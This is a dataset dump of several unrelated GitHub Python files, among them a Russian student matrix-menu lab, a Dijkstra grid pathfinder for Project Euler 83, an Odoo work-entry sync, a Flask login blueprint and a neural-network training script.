print('''\n-----------------------------------------------------------------------------------------------\n| 1) Ввести матрицу |\n| 2) Добавить строку |\n| 3) Удалить строку |\n| 4) Добавить столбец |\n| 5) Удалить столбец |\n| 6) Найти строку, имеющую наименьшее количество четных элементов |\n| 7) Переставить местами строки с наибольшим и наименьшим количеством отрицательных элементов |\n| 8) Найти столбец, имеющий наименьшее количество отрицательных элементов |\n| 9) Переставить местами столбцы с максимальной и минимальной суммой элементов |\n| 10) Вывести текущую матрицу |\n-----------------------------------------------------------------------------------------------\n ''')\n\n # Ввод и проверка номера операции на допустимое значение\n operation = input('Выберете номер операции от 1 до 10 или введите 0, чтобы выйти: ').strip()\n while not operation.isdecimal() or not 1 <= int(operation) <= 10:\n if operation == '0':\n flag = False\n break\n print('Неправильный номер операции')\n operation = input('Выберете номер операции от 1 до 10 или введите 0, чтобы выйти: ').strip()\n operation = int(operation)\n\n if operation == 1:\n # Очистка массива\n massive.clear()\n # Инициализация длины и высоты\n length = input('Введите длину матрицы: ').strip()\n while not length.isdecimal() or int(length) == 0:\n print('Некорректное число')\n length = input('Введите длину матрицы: ').strip()\n length = int(length)\n width = input('Введите высоту матрицы: ').strip()\n while not width.isdecimal() or int(width) == 0:\n print('Некорректное число')\n width = input('Введите высоту матрицы: ').strip()\n width = int(width)\n # Ввод элементов\n for i in range(width):\n massive.append([])\n for j in range(length):\n element = input(f'Введите элемент номер {j + 1} в строку номер {i + 1}: ').strip()\n while not str_is_int(element):\n print('Некорректное число')\n element = input(f'Введите элемент номер {j + 1} в строку номер {i + 1}: ').strip()\n massive[i].append(int(element))\n\n elif operation == 2:\n # Добавления строки любой длины\n if len(massive) == 0:\n massive.append([])\n check_str = input('Введите элементы новой строки через пробел: ').split()\n # Проверка каждого символа на корректность\n for i in range(len(check_str)):\n # Вводить значение, пока оно не будет корректно\n while not str_is_int(check_str[i]):\n print(f'Элемент номер {i + 1} введен некорректно')\n check_str[i] = input(f'Повторите ввод элемента номер {i + 1}: ').strip()\n massive[0].append(int(check_str[i]))\n else:\n # Инициализация элемента\n new_str = []\n place = input('Введите место, в которое нужно вставить строку: ').strip()\n while not place.isdecimal() or not 1 <= int(place) <= len(massive) + 1:\n print('Неправильный номер строки')\n place = input(f'Введите место для строки из промежутка [1, {len(massive) + 1}]: ').strip()\n place = int(place)\n # Добавление строки определенной длины\n for i in range(len(massive[0])):\n str_element = input(f'Введите элемент номер {i + 1}: ').strip()\n while not str_is_int(str_element):\n print('Некорректное число')\n str_element = input(f'Введите элемент номер {i + 1}: ').strip()\n new_str.append(int(str_element))\n command = input('Нажмите 1, чтобы добавить строку алгоритмически, или 2, чтобы добавить ее с помощью insert(): ').strip()\n while not (command == '1' or command == '2'):\n print('Неправилльный номер команды')\n command = input('Нажмите 1, чтобы добавить строку алгоритмически, или 2, чтобы добавить ее с помощью insert(): ').strip()\n # Выбор алгоритма добавления\n if command == '1':\n massive.append(new_str)\n # Перемещение элемента на нужное место\n for i in range(len(massive) - 1, place - 1, -1):\n massive[i - 1], massive[i] = massive[i], massive[i - 1]\n else:\n massive.insert(place - 1, new_str)\n\n elif operation == 3:\n if len(massive) == 0:\n print('Невозможно выполнить операцию: матрица пустая')\n else:\n # Ввод и проверка номера элемента на допустимое значение\n element = input('Введите номер строки, которую стоит удалить: ').strip()\n while not element.isdecimal() or not 1 <= int(element) <= len(massive):\n print('Неправильный номер строки')\n element = input(f'Введите номер строки из промежутка [1, {len(massive)}], которую стоит удалить: ').strip()\n element = int(element)\n command = input('Нажмите 1, чтобы удалить строку алгоритмически, или 2, чтобы удалить ее с помощью pop(): ').strip()\n while not (command == '1' or command == '2'):\n print('Неправилльный номер команды')\n command = input('Нажмите 1, чтобы удалить строку алгоритмически, или 2, чтобы удалить ее с помощью pop(): ').strip()\n # Перемещение элемента в конец и обрезка\n if command == '1':\n for i in range(element - 1, len(massive) - 1):\n massive[i] = massive[i + 1]\n massive.pop()\n else:\n massive.pop(element - 1)\n\n elif operation == 4:\n # Добавление столбца любой длины\n if len(massive) == 0:\n check_column = input('Введите элементы нового столбца через пробел: ').split()\n # Проверка каждого символа на корректность\n for i in range(len(check_column)):\n # Вводить значение, пока оно не будет корректно\n while not str_is_int(check_column[i]):\n print(f'Элемент номер {i + 1} введен некорректно')\n check_column[i] = input(f'Повторите ввод элемента номер {i + 1}: ').strip()\n check_column[i] = int(check_column[i])\n for i in range(len(check_column)):\n massive.append([])\n massive[i].append(check_column[i])\n else:\n # Инициализация элемента\n new_column = []\n place = input('Введите место, в которое нужно вставить столбец: ').strip()\n while not place.isdecimal() or not 1 <= int(place) <= len(massive[0]) + 1:\n print('Неправильный номер столбца')\n place = input(f'Введите место для столбца из промежутка [1, {len(massive[0]) + 1}]: ').strip()\n place = int(place)\n # Добавление столбца определенной длины\n for i in range(len(massive)):\n column_element = input(f'Введите элемент номер {i + 1}: ').strip()\n while not str_is_int(column_element):\n print('Некорректное число')\n column_element = input(f'Введите элемент номер {i + 1}: ').strip()\n new_column.append(int(column_element))\n command = input('Нажмите 1, чтобы добавить столбец алгоритмически, или 2, чтобы добавить его с помощью insert(): ').strip()\n while not (command == '1' or command == '2'):\n print('Неправилльный номер команды')\n command = input('Нажмите 1, чтобы добавить столбец алгоритмически, или 2, чтобы добавить его с помощью insert(): ').strip()\n # Выбор алгоритма добавления\n if command == '1':\n for i in range(len(massive)):\n massive[i].append(new_column[i])\n # Перемещение элемента на нужное место\n for i in range(len(massive) - 1, place - 1, -1):\n for j in range(len(massive[0])):\n massive[i][j - 1], massive[i][j] = massive[i][j], massive[i][j - 1]\n else:\n for i in range(len(massive)):\n massive[i].insert(place - 1, new_column[i])\n\n elif operation == 5:\n if len(massive) == 0:\n print('Невозможно выполнить операцию: матрица пустая')\n else:\n # Ввод и проверка номера элемента на допустимое значение\n element = input('Введите номер столбца, который стоит удалить: ').strip()\n while not element.isdecimal() or not 1 <= int(element) <= len(massive[0]):\n print('Неправильный номер стролбца')\n element = input(f'Введите номер столбца из промежутка [1, {len(massive[0])}], который стоит удалить: ').strip()\n element = int(element)\n command = input('Нажмите 1, чтобы удалить столбец алгоритмически, или 2, чтобы удалить его с помощью pop(): ').strip()\n while not (command == '1' or command == '2'):\n print('Неправилльный номер команды')\n command = input('Нажмите 1, чтобы удалить столбец алгоритмически, или 2, чтобы удалить его с помощью pop(): ').strip()\n # Перемещение элемента в конец и обрезка\n if command == '1':\n for i in range(len(massive)):\n for j in range(element - 1, len(massive[0]) - 1):\n massive[i][j] = massive[i][j + 1]\n massive[i].pop()\n else:\n for i in range(len(massive)):\n massive[i].pop(element - 1)\n\n elif operation == 6:\n if len(massive) == 0:\n print('Невозможно выполнить операцию: матрица пустая')\n elif len(massive) == 1:\n print(f'Строка с наименьшим количеством четных элементов: {massive[0]}')\n else:\n min_str = 0\n min_count = len(massive[0])\n # Проход по строкам\n for i in range(len(massive)):\n count = 0\n for j in range(len(massive[0])):\n if massive[i][j] % 2 == 0:\n count += 1\n if count < min_count:\n min_count = count\n min_str = i\n print(f'Строка с наименьшим количеством четных элементов: {massive[min_str]}')\n\n elif operation == 7:\n if len(massive) == 0:\n print('Невозможно выполнить операцию: матрица пустая')\n elif len(massive) == 1:\n print('Невозможно выполнить операцию: в матрице одна строка')\n else:\n max_num_str = -1\n i_max_str = 0\n i_min_str = 0\n min_num_str = -1\n # Проход по всем строкам, переопределение минимума и максимума\n for i in range(len(massive)):\n tek_num_str = 0\n for j in range(len(massive[0])):\n if massive[i][j] < 0:\n tek_num_str += 1\n if tek_num_str < min_num_str:\n min_num_str = tek_num_str\n i_min_str = i\n if tek_num_str > max_num_str:\n max_num_str = tek_num_str\n i_max_str = i\n # Перемещение строк\n massive[i_min_str], massive[i_max_str] = massive[i_max_str], massive[i_min_str]\n \n elif operation == 8:\n if len(massive) == 0:\n print('Невозможно выполнить операцию: матрица пустая')\n else:\n min_num_col = len(massive[0])\n j_min_col_sum = 0\n # Проход по каждому элементу столбца и переопределение минимума\n for j in range(len(massive[0])):\n tek_num_col = 0\n for i in range(len(massive)):\n if massive[i][j] < 0:\n tek_num_col += 1\n if tek_num_col < min_num_col:\n min_num_col = tek_num_col\n j_min_col_sum = j\n answer = '['\n # заись нужного столбца в ответ\n for i in range(len(massive)):\n answer += f'{massive[i][j_min_col_sum]}, '\n answer = answer.rstrip(', ') + ']'\n print('Столбец с минимальным количеством отрицательных элементов:', answer)\n\n elif operation == 9:\n if len(massive) == 0:\n print('Невозможно выполнить операцию: матрица пустая')\n elif len(massive[0]) == 1:\n print('Невозможно выполнить операцию: в матрице один столбец')\n else:\n max_sum_col = 0\n # Проход по первому столбцу для инициализации минимума и максимума\n for i in range(len(massive)):\n max_sum_col += massive[i][0]\n j_max_col = 0\n j_min_col = 0\n min_sum_col = max_sum_col\n # Проход по остальным столбцам, переопределение минимума и максимума\n for j in range(1, len(massive[0])):\n tek_sum_col = 0\n for i in range(len(massive)):\n tek_sum_col += massive[i][j]\n if tek_sum_col > max_sum_col:\n max_sum_col = tek_sum_col\n j_max_col = j\n if tek_sum_col < min_sum_col:\n min_sum_col = tek_sum_col\n j_min_col = j\n # Перемещение элементов в каждой строке\n for i in range(len(massive)):\n massive[i][j_min_col], massive[i][j_max_col] = massive[i][j_max_col], massive[i][j_min_col]\n\n elif operation == 10:\n if len(massive) == 0:\n print(f'Текущий массив: {massive}')\n # Прохождение по каждому элементу и создание строки ответа\n for i in range(len(massive)):\n line = ''\n for j in range(len(massive[0])):\n line += f'[{massive[i][j]:>4}]'\n if i == 0:\n line = 'Текущий массив: ' + line\n else:\n line = ' ' * 16 + line\n print(line)","repo_name":"LockeRL/Python","sub_path":"Sem1/lab8.py","file_name":"lab8.py","file_ext":"py","file_size_in_byte":19468,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"5664413126","text":"import collections\nimport heapq\n\nclass PriorityQueue:\n def __init__(self):\n self.elements = []\n \n def empty(self):\n return len(self.elements) == 0\n \n def put(self, item, priority):\n heapq.heappush(self.elements, (priority, item))\n \n def get(self):\n return heapq.heappop(self.elements)[1]\n\nclass Queue:\n def __init__(self):\n self.elements = collections.deque()\n \n def empty(self):\n return len(self.elements) == 0\n \n def put(self, x):\n self.elements.append(x)\n \n def get(self):\n return self.elements.popleft()\n\n \nclass SimpleGraph:\n def __init__(self):\n self.edges = {}\n \n def neighbors(self, id):\n return self.edges[id]\n\n\nclass SquareGrid:\n def __init__(self, width, height):\n self.width = width\n self.height = height\n self.walls = []\n \n def in_bounds(self, id):\n (x, y) = id\n return 0 <= x < self.width and 0 <= y < self.height\n \n def passable(self, id):\n return id not in self.walls\n \n def neighbors(self, id):\n (x, y) = id\n results = [(x+1, y), (x, y-1), (x-1, y), (x, y+1)]\n if (x + y) % 2 == 0: results.reverse() # aesthetics\n results = filter(self.in_bounds, results)\n results = filter(self.passable, results)\n return results\n\nclass GridWithWeights(SquareGrid):\n def __init__(self, width, height):\n super().__init__(width, height)\n self.weights = {}\n \n def cost(self, from_node, to_node):\n return self.weights.get(to_node,1)\n\nexample_graph = SimpleGraph()\nexample_graph.edges = {\n 'A': ['B'],\n 'B': ['A', 'C', 'D'],\n 'C': ['A'],\n 'D': ['E', 'A'],\n 'E': ['B']\n}\n\ndef breadth_first_search(graph, start, goal):\n frontier = Queue()\n frontier.put(start)\n came_from = {}\n came_from[start] = None\n \n while not frontier.empty():\n current = frontier.get()\n \n if current == goal:\n break\n \n for next in graph.neighbors(current):\n if next not in came_from:\n frontier.put(next)\n came_from[next] = current\n \n return came_from\n\ndef from_id_width(id, *, width):\n return (id % width, id // width)\n\ndef draw_grid(graph, width=2, **style):\n for y in range(graph.height):\n for x in range(graph.width):\n print(\"%%-%ds\" % width % draw_tile(graph, (x, y), style, width), end=\"\")\n print()\n\ndef draw_tile(graph, id, style, width):\n r = \".\"\n if 'number' in style and id in style['number']: r = \"%d\" % style['number'][id]\n if 'point_to' in style and style['point_to'].get(id, None) is not None:\n (x1, y1) = id\n (x2, y2) = style['point_to'][id]\n if x2 == x1 + 1: r = \"\\u2192\"\n if x2 == x1 - 1: r = \"\\u2190\"\n if y2 == y1 + 1: r = \"\\u2193\"\n if y2 == y1 - 1: r = \"\\u2191\"\n if 'start' in style and id == style['start']: r = \"A\"\n if 'goal' in style and id == style['goal']: r = \"Z\"\n if 'path' in style and id in style['path']:\n r = \"@\"\n LPath.append(id)\n if id in graph.walls: r = \"#\" * width\n return r\n\ndef dijkstra_search(graph, start, goal):\n frontier = PriorityQueue()\n frontier.put(start, 0)\n came_from = {}\n cost_so_far = {}\n came_from[start] = None\n cost_so_far[start] = 0\n \n while not frontier.empty():\n current = frontier.get()\n \n if current == goal:\n break\n \n for next in graph.neighbors(current):\n new_cost = cost_so_far[current] + graph.cost(current, next)\n if next not in cost_so_far or new_cost < cost_so_far[next]:\n cost_so_far[next] = new_cost\n priority = new_cost\n frontier.put(next, priority)\n came_from[next] = current\n \n return came_from, cost_so_far\n\ndef reconstruct_path(came_from, start, goal):\n current = goal\n path = [current]\n while current != start:\n current = came_from[current]\n path.append(current)\n path.reverse()\n return path\n\n\"\"\"DIAGRAM1_WALLS = [from_id_width(id, width=30) for id in [21,22,51,52,81,82,93,94,111,112,123,124,133,134,141,142,153,154,163,164,171,172,173,174,175,183,184,193,194,201,202,203,204,205,213,214,223,224,243,244,253,254,273,274,283,284,303,304,313,314,333,334,343,344,373,374,403,404,433,434]]\n\ng = SquareGrid(30, 15)\ng.walls = DIAGRAM1_WALLS\n\nparents = breadth_first_search(g, (8, 7), (17,2))\ndraw_grid(g, width=2, point_to=parents, start=(8, 7), goal = (17,2))\nprint()\n\ndiagram4 = GridWithWeights(10, 10)\ndiagram4.walls = [(1, 7), (1, 8), (2, 7), (2, 8), (3, 7), (3, 8)]\ndiagram4.weights = {loc: 5 for loc in [(3, 4), (3, 5), (4, 1), (4, 2),\n (4, 3), (4, 4), (4, 5), (4, 6), \n (4, 7), (4, 8), (5, 1), (5, 2),\n (5, 3), (5, 4), (5, 5), (5, 6), \n (5, 7), (5, 8), (6, 2), (6, 3), \n (6, 4), (6, 5), (6, 6), (6, 7), \n (7, 3), (7, 4), (7, 5)]}\n\ncame_from, cost_so_far = dijkstra_search(diagram4, (1, 4), (7, 8))\ndraw_grid(diagram4, width=3, point_to=came_from, start=(1, 4), goal=(7, 8))\nprint()\ndraw_grid(diagram4, width=3, number=cost_so_far, start=(1, 4), goal=(7, 8))\nprint()\ndraw_grid(diagram4, width=3, path=reconstruct_path(came_from, start=(1, 4), goal=(7, 8)))\"\"\"\n\nf = open(\"PEuler83.txt\", \"r\")\n\nL1 = []\n\nlines = f.readlines()\n\nfor line in lines:\n lineList = line.split(',')\n lineList[-1] = lineList[-1][:-1]\n for x in range(len(lineList)):\n lineList[x] = int(lineList[x])\n L1.append(lineList)\n\n\"\"\"L1 = [[131,673,234,103,18],\n [201,96,342,965,150],\n [630,803,746,422,111],\n [537,699,497,121,956],\n [805,732,524,37,331]]\"\"\"\n\nLPath = []\n\npeuler83 = GridWithWeights(len(L1),len(L1))\nweightDic = {}\nfor x in range(len(L1)):\n for y in range(len(L1)):\n weightDic[(x,y)] = L1[x][y]\n\npeuler83.weights = weightDic\nprint()\ncame_from, cost_so_far = dijkstra_search(peuler83, (0,0) , (len(L1)-1,len(L1)-1))\ndraw_grid(peuler83, width=2, point_to=came_from, start=(0,0), goal = (len(L1)-1,len(L1)-1))\nprint()\ndraw_grid(peuler83, width=2, number=cost_so_far, start=(0, 0), goal=(len(L1)-1, len(L1)-1))\nprint()\ndraw_grid(peuler83, width=2, path=reconstruct_path(came_from, start=(0,0), goal=(len(L1)-1, len(L1)-1)))\n\ncounter = 0\n\nfor x in LPath:\n counter += L1[x[0]][x[1]]\nprint()\nprint(counter)\n","repo_name":"arashrai/Algorithms-Functions","sub_path":"AStar.py","file_name":"AStar.py","file_ext":"py","file_size_in_byte":6579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10412351765","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2018/10/16/016 15:29\n# @Author : K_oul\n# @File : to_db.py\n# @Software: PyCharm\nimport datetime\nimport uuid\nfrom app.db.db import MySQL\n\nmy_db = MySQL()\n\ndef buyin_to_db(result, token):\n data = {\n 'token': token,\n 'showId': result.get('showId'),\n 'strNick': result.get('strNick'),\n 'gameRoomName': str(result.get('gameRoomName').encode()),\n 'gameRoomId': result.get('gameRoomId'),\n 'buyStack': result.get('buyStack'),\n 'uuid': result.get('uuid'),\n 'totalBuyin': result.get('totalBuyin'),\n 'totalProfit': result.get('totalProfit'),\n 'update_time': datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"),\n 'status': 0,\n }\n\n my_db.insert('check_buyin', data)\n\n\ndef history_to_db(history_list, club_id):\n zj_list = [int(i[20]) for i in history_list[1:]]\n zj_max = max(zj_list)\n max_counts = zj_list.count(zj_max)\n zj_min = min(zj_list)\n min_counts = list(zj_list).count(zj_min)\n for temp in history_list[1:]:\n if temp[11] == club_id:\n ismvp = 0\n count_mvp = 0\n if int(temp[20]) == zj_max:\n ismvp = 1\n count_mvp = max_counts\n elif int(temp[20]) == zj_min:\n ismvp = 2\n count_mvp = min_counts\n\n data = {\n 'ID': str(uuid.uuid1()),\n 'room_id': temp[2],\n 'union_account': temp[12],\n 'paiju_type': temp[0],\n 'paiju_name': str(temp[1].encode()),\n 'jianjuzhe_name': temp[3],\n 'mangzhu': temp[4],\n 'table': temp[6],\n 'shichang': temp[7],\n 'shoushu': temp[8],\n 'player_id': temp[9],\n 'player_name': temp[10],\n 'union_id': temp[11],\n 'union_name': temp[12],\n 'mairu': temp[13],\n 'daichu': temp[14],\n 'baoxian_mairu': temp[15],\n 'baoxian_shouru': temp[16],\n 'baoxian_total': temp[17],\n 'baoxian_club': temp[18],\n 'baoxian': temp[19],\n 'zhanji': temp[20],\n 'over_time': temp[21],\n 'update_time': datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"),\n 'encode_paiju_name': str(temp[1].encode()),\n 'status': 0,\n 'ismvp': ismvp,\n 'count_mvp': count_mvp,\n }\n print(data)\n my_db.insert('auto_import', data)\n","repo_name":"k-oul/game_login","sub_path":"app/db/to_db.py","file_name":"to_db.py","file_ext":"py","file_size_in_byte":2625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15831362209","text":"from datetime import timedelta\r\nimport pytz\r\n\r\nfrom odoo import models, fields, api, _\r\nfrom odoo.exceptions import UserError\r\n\r\n\r\nclass HrWorkEntry(models.Model):\r\n _inherit = 'hr.work.entry'\r\n\r\n def sync_wrk_entries_biotime(self):\r\n from_date = self.env.context.get('default_date_start', False)\r\n end_date = self.env.context.get('default_date_end', False)\r\n\r\n if from_date and end_date:\r\n from_date = fields.Datetime.to_datetime(from_date)\r\n end_date = fields.Datetime.to_datetime(end_date + ' 23:59:59')\r\n atts = self.env['hr.attendance'].search([])\r\n\r\n if atts.filtered(lambda rec: not rec.check_in or not rec.check_out):\r\n raise UserError(\r\n \"Veuillez remplir les fiches de présences correctement.\")\r\n\r\n atts = atts.filtered(\r\n lambda rec: rec.check_in and rec.check_out and rec.check_in >= from_date and rec.check_out <= end_date)\r\n else:\r\n atts = self.env['hr.attendance'].search([])\r\n\r\n for att in atts:\r\n local_att_check_in = pytz.utc.localize(att.check_in, is_dst=None).astimezone(\r\n pytz.timezone(self.env.user.partner_id.tz or 'GMT'))\r\n local_att_check_out = pytz.utc.localize(att.check_out, is_dst=None).astimezone(\r\n pytz.timezone(self.env.user.partner_id.tz or 'GMT'))\r\n\r\n shift_line = att.employee_id.biotime_shift_id.biotime_shift_lines.filtered(\r\n lambda shift_line: int(shift_line.day_in) == local_att_check_in.weekday() and int(shift_line.day_out) == local_att_check_out.weekday())\r\n\r\n if shift_line and shift_line.ensure_one():\r\n margin_check_in = (shift_line.check_in_end -\r\n shift_line.check_in_start)\r\n margin_check_out = (shift_line.check_out_end -\r\n shift_line.check_out_start)\r\n\r\n eq_wrk_entry = self.env['hr.work.entry'].search([\r\n ('employee_id', '=', att.employee_id.id),\r\n ('date_start', '>=', att.check_in -\r\n timedelta(hours=margin_check_in)),\r\n ('date_stop', '<=', att.check_out +\r\n timedelta(hours=margin_check_out)),\r\n ('state', '=', 'draft')\r\n ])\r\n\r\n if eq_wrk_entry:\r\n work_entry_type_id = self.env['hr.work.entry.type'].search(\r\n [('code', '=', 'WORK100')])\r\n eq_wrk_entry[0].write({\r\n 'name': str(work_entry_type_id.name) + ' : ' + str(att.employee_id.name),\r\n 'date_start': att.check_in,\r\n 'work_entry_type_id': work_entry_type_id.id,\r\n 'state': 'validated'\r\n })\r\n eq_wrk_entry[-1].write({\r\n 'name': str(work_entry_type_id.name) + ' : ' + str(att.employee_id.name),\r\n 'work_entry_type_id': work_entry_type_id.id,\r\n # Allow user to aproove overtimes\r\n 'date_end': att.check_out if not att.overtime else eq_wrk_entry[-1].date_end,\r\n 'state': 'validated'\r\n })\r\n","repo_name":"Conscior/biotime_hr_work_entry","sub_path":"models/hr_work_entry.py","file_name":"hr_work_entry.py","file_ext":"py","file_size_in_byte":3330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26193664467","text":"import pytest\nfrom random import randint\nfrom math import sqrt\nfrom mypkg.advanced_data_structures.sqrt_decomposition.sqrt_RAQ import BucketRAQ\n\n\ndef test_BucketRAQ():\n \"\"\"\n 1 <= size <= M のサイズの列を Iteration 回ランダム生成し、それぞれについて Iteration 回ランダムクエリを投げる。\n クエリへの回答を愚直に更新したものと比較するテストを行う。\n \"\"\"\n with pytest.raises(ValueError):\n BucketRAQ(total_size=100, chunk_size=101) # invalid chunk size\n with pytest.raises(IndexError):\n raq = BucketRAQ(100, chunk_size=10)\n raq.range_add(-1, 50, 1000) # invalid slices\n \n Iteration = 50\n M = 50\n for _ in range(Iteration):\n size = randint(1, M)\n chunk_size = randint(int(sqrt(size)), size)\n L = [randint(-100, 100) for _ in range(size)]\n raq = BucketRAQ(size, chunk_size)\n raq.build(L)\n\n for _ in range(Iteration):\n if randint(0, 1) == 0:\n # 範囲の加算クエリ\n l = randint(0, size)\n r = randint(l, size)\n num = randint(-100, 100)\n raq.range_add(l, r, num)\n for i in range(l, r):\n L[i] += num\n else:\n # 1 点の質問クエリ\n ind = randint(0, size - 1)\n assert raq.get(ind) == L[ind]\n\n\n\nif __name__ == \"__main__\":\n pytest.main(['-v', __file__])\n","repo_name":"ikeshou/Kyoupuro_library_python","sub_path":"tests/advanced_data_structures/sqrt_decomposition/test_sqrt_RAQ.py","file_name":"test_sqrt_RAQ.py","file_ext":"py","file_size_in_byte":1492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"14104594647","text":"from flask import Blueprint, jsonify, request\nfrom cinema.models.user import User\nfrom cinema.utils.jwt import create_user_and_get_token, get_token_or_exception, token_required\nfrom cinema.utils.validators import validate_auth_request_body\nfrom cinema.utils.custom_errors import ResourceAlreadyExistsError, UnauthorizedError, ValidationError, ResourceDoesNotExistError\n\n\nauth_bp = Blueprint(\"auth\", __name__, url_prefix=\"auth\")\n\n\n@auth_bp.route('register', methods=(['POST']))\ndef register():\n body: dict = request.json\n try:\n valid_body = validate_auth_request_body(body)\n token = create_user_and_get_token(valid_body)\n except (ValidationError, ResourceAlreadyExistsError) as e:\n return jsonify({\"message\": str(e)}), e.code\n\n return jsonify({\"token\": token})\n\n\n@auth_bp.route('login', methods=(['POST']))\ndef login():\n body: dict = request.json\n try:\n valid_body = validate_auth_request_body(body)\n token = get_token_or_exception(valid_body)\n except (ValidationError, ResourceDoesNotExistError, UnauthorizedError) as e:\n return jsonify({\"message\": str(e)}), e.code\n\n return jsonify({\"token\": token})\n\n\n@auth_bp.route('user')\n@token_required\ndef get_user(current_user: User):\n return jsonify({\"username\": current_user.username})\n","repo_name":"Marat5/cinema","sub_path":"backend/cinema/views/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"20830194655","text":"import matplotlib.pyplot as plt \nimport json\nimport statistics\nimport random\n\nresultsDir = '../results/'\nblocks = {}\n\nfor i in [20,40,60,80]:\n with open(resultsDir + str(i) + '.json', 'r') as reader:\n data = []\n j = 0\n for line in reader.readlines():\n if j == 1000:\n break\n entry = json.loads(line)\n data.append((entry['blockNum'],entry['ceilingLossAtPercentile']))\n j = j + 1\n \n plt.plot([x[0] for x in data],[x[1] for x in data], label=str(i) + 'Nth Percentile')\n\n # data.sort(key=lambda x : x['blockNum'], reverse=True)\n # blocks = list(map(lambda x : x['blockNum'], data))\n # cost = list(map(lambda x : x['ceilingLossAtPercentile'], data)) \n # plt.bar(i, median, align='center', width=5) \n\nplt.legend(loc=1)\nplt.xlabel('Blocks #') \nplt.ylabel('Loss (ETH)') \n# plt.title('')\nplt.xticks([])\nplt.savefig('test.png')\n\n","repo_name":"thedarkspy/eth-analysis","sub_path":"eth_analysis/plot-results.py","file_name":"plot-results.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"28990546309","text":"import torch\nimport torch.optim as optim\n\nimport time\nimport argparse\n\nfrom dataset import CamLocDataset\nfrom network import Network\nimport util\n\nparser = argparse.ArgumentParser(\n\tdescription='Train scene coordinate regression using target scene coordinates.',\n\tformatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\nparser.add_argument('scene', help='name of a scene in the dataset folder')\n\nparser.add_argument('network', help='output file name for the network')\n\nparser.add_argument('--learningrate', '-lr', type=float, default=0.0001, \n\thelp='learning rate')\n\nparser.add_argument('--iterations', '-iter', type=int, default=500000,\n\thelp='number of training iterations, i.e. numer of model updates')\n\nparser.add_argument('--softclamp', '-sc', type=float, default=10, \n\thelp='robust square root loss after this threshold, in meters')\n\nparser.add_argument('--hardclamp', '-hc', type=float, default=1000, \n\thelp='clamp loss with this threshold, in meters')\n\nparser.add_argument('--session', '-sid', default='',\n\thelp='custom session name appended to output files, useful to separate different runs of a script')\n\nopt = parser.parse_args()\n\ntrainset = CamLocDataset(\"./dataset/\" + opt.scene + \"/train\")\ntrainset_loader = torch.utils.data.DataLoader(trainset, shuffle=True, num_workers=6)\n\nprint(\"Found %d training images for %s.\" % (len(trainset), opt.scene))\n\nprint(\"Calculating mean scene coordinate for the scene...\")\n\nmean = torch.zeros((3))\ncount = 0\n\nfor image, gt_pose, gt_coords, focal_length, file in trainset_loader:\n\n\tgt_coords = gt_coords[0]\n\tgt_coords = gt_coords.view(3, -1)\n\n\tcoord_mask = gt_coords.abs().sum(0) > 0\n\tif coord_mask.sum() > 0:\n\t\tgt_coords = gt_coords[:, coord_mask]\n\n\tmean += gt_coords.median(1)[0]\n\t\nmean /= len(trainset)\n\nprint(\"Done. Mean: %.2f, %.2f, %.2f\\n\" % (mean[0], mean[1], mean[2]))\n\n# create network\nnetwork = Network(mean)\nnetwork = network.cuda()\nnetwork.train()\n\noptimizer = optim.Adam(network.parameters(), lr=opt.learningrate)\n\niteration = 0\nepochs = int(opt.iterations / len(trainset))\n\n# keep track of training progress\ntrain_log = open('log_init_%s_%s.txt' % (opt.scene, opt.session), 'w', 1)\n\nfor epoch in range(epochs):\t\n\n\tprint(\"=== Epoch: %d ======================================\" % epoch)\n\n\tfor image, gt_pose, gt_coords, focal_length, file in trainset_loader:\n\n\t\tstart_time = time.time()\n\n\t\tgt_coords = gt_coords.cuda()\n\t\timage = image.cuda()\n\n\t\t#random shift as data augmentation\n\t\tpadX, padY, image = util.random_shift(image, network.OUTPUT_SUBSAMPLE / 2)\n\t\n\t\tprediction, neural_guidance = network(image) \n\t\t# neural guidance is ignored / not trained during initlization\n\n\t\tprediction = prediction.squeeze().view(3, -1)\n\t\tgt_coords = gt_coords.squeeze().view(3, -1)\n\n\t\t# mask out invalid coordinates (all zeros)\n\t\tcoords_mask = gt_coords.abs().sum(0) != 0 \n\n\t\tif coords_mask.sum() == 0:\n\t\t\tprint(\"Empty ground truth scene coordinates! Skip.\")\n\t\t\tcontinue\n\n\t\tprediction = prediction[:,coords_mask]\n\t\tgt_coords = gt_coords[:,coords_mask]\n\n\t\tloss = torch.norm(prediction - gt_coords, dim=0)\n\n\t\tloss_mask = loss < opt.hardclamp\n\t\tloss = loss[loss_mask]\n\n\t\t# soft clamping of loss for stability\n\t\tloss_l1 = loss[loss <= opt.softclamp]\n\t\tloss_sqrt = loss[loss > opt.softclamp]\n\t\tloss_sqrt = torch.sqrt(opt.softclamp * loss_sqrt)\n\n\t\trobust_loss = (loss_l1.sum() + loss_sqrt.sum()) / float(loss.size(0))\n\n\t\trobust_loss.backward()\t# calculate gradients (pytorch autograd)\n\t\toptimizer.step()\t\t# update all network parameters\n\t\toptimizer.zero_grad()\n\t\t\n\t\tprint('Iteration: %6d, Loss: %.1f, Time: %.2fs' % (iteration, robust_loss, time.time()-start_time), flush=True)\n\t\ttrain_log.write('%d %f\\n' % (iteration, robust_loss))\n\n\t\titeration = iteration + 1\n\n\tprint('Saving snapshot of the network to %s.' % opt.network)\n\ttorch.save(network.state_dict(), opt.network)\n\t\n\nprint('Done without errors.')\ntrain_log.close()\n","repo_name":"vislearn/ngdsac_camreloc","sub_path":"train_init.py","file_name":"train_init.py","file_ext":"py","file_size_in_byte":3863,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"78"} 